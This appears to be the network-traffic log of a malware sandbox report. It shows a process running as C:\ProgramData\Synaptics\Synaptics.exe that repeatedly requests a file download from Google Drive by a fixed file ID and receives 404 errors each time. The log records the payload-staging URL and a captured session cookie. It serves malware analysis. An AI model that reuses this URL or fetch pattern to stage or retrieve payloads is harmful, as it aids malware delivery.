                                                                                            2025-01-02 19:30:03 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="H2llTVP-OOz760yZJiPRBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:03 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            80 | 192.168.2.9 | 50075 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:02 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-hkT3-CjNwElzwkN7PUKgMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            81 | 192.168.2.9 | 50076 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:02 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4HC4BzbiNSYs7SCz_pLL2Y8vD4k-tKkJs7JlmH3G4dpsit9TRdPW27Hfl3Dowjkt3n
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x_tBSapZ8I_qZRaXX4FKww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:03 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:03 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="64R9QLcx7JyNr9o63fGvTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:03 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            82 | 192.168.2.9 | 50074 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:02 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:03 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:03 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ZXKRNd_WsyLLQCMY5CvNTQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            83 | 192.168.2.9 | 50083 | 172.217.18.14 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:03 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4vDz837TE-fyh4Mm9odDXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            84 | 192.168.2.9 | 50085 | 216.58.206.65 | 443 | 7712 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2025-01-02 19:30:03 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7DJkL_1k3p9Jm9qH6m00ifJonYXKMufLFJzyLhGnxw3s0cn8SmP-0OE54o9Lo-j9sw
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-A7lWMEU92VvuEHglevTTKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:04 UTC  1390  IN
                                                                                            Data Ascii: t Found)!!1</title><style nonce="JygWxfgtAWja071fEuIkLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:04 UTC  115  IN
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            85  192.168.2.9  50086  172.217.18.14  443  7712  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            2025-01-02 19:30:03 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Ut-Fk61ssX9qXl9QhNDzTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            86  192.168.2.9  50089  216.58.206.65  443  7712  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            2025-01-02 19:30:04 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:04 UTC  1243  IN  HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6HsKnWIfQvgEru7jQGgM419bNZ9E47e_kTVmr-mH-78XMyxclOxJymO9H7x6EFVgiE
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:04 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-k1w-qb6td-dd__bLLo89-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:04 UTC  147  IN
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:04 UTC  1390  IN
                                                                                            Data Ascii: t Found)!!1</title><style nonce="xhSX5YA_RJqF72LVWpyTcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:04 UTC  115  IN
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            87  192.168.2.9  50097  172.217.18.14  443  7712  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            2025-01-02 19:30:04 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-A4RUEqztqqPt27hVztUZ1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            88  192.168.2.9  50098  216.58.206.65  443  7712  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            2025-01-02 19:30:04 UTC  388  OUT  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC  1250  IN  HTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4BwuyeDri6hDV9YS8efASC0S144CcwJ314_3rhW9XjjGcUlOWiftmxM43p3h7n_FJgiadv5f8
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Uthj4jhh8rAQIfy2DwZ4NQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:05 UTC  140  IN
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:05 UTC  1390  IN
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="Nqa_NoErehvXtDKZsuDqtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:05 UTC  122  IN
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                            89  192.168.2.9  50096  172.217.18.14  443  7712  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                            2025-01-02 19:30:05 UTC  345  OUT  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC  1314  IN  HTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
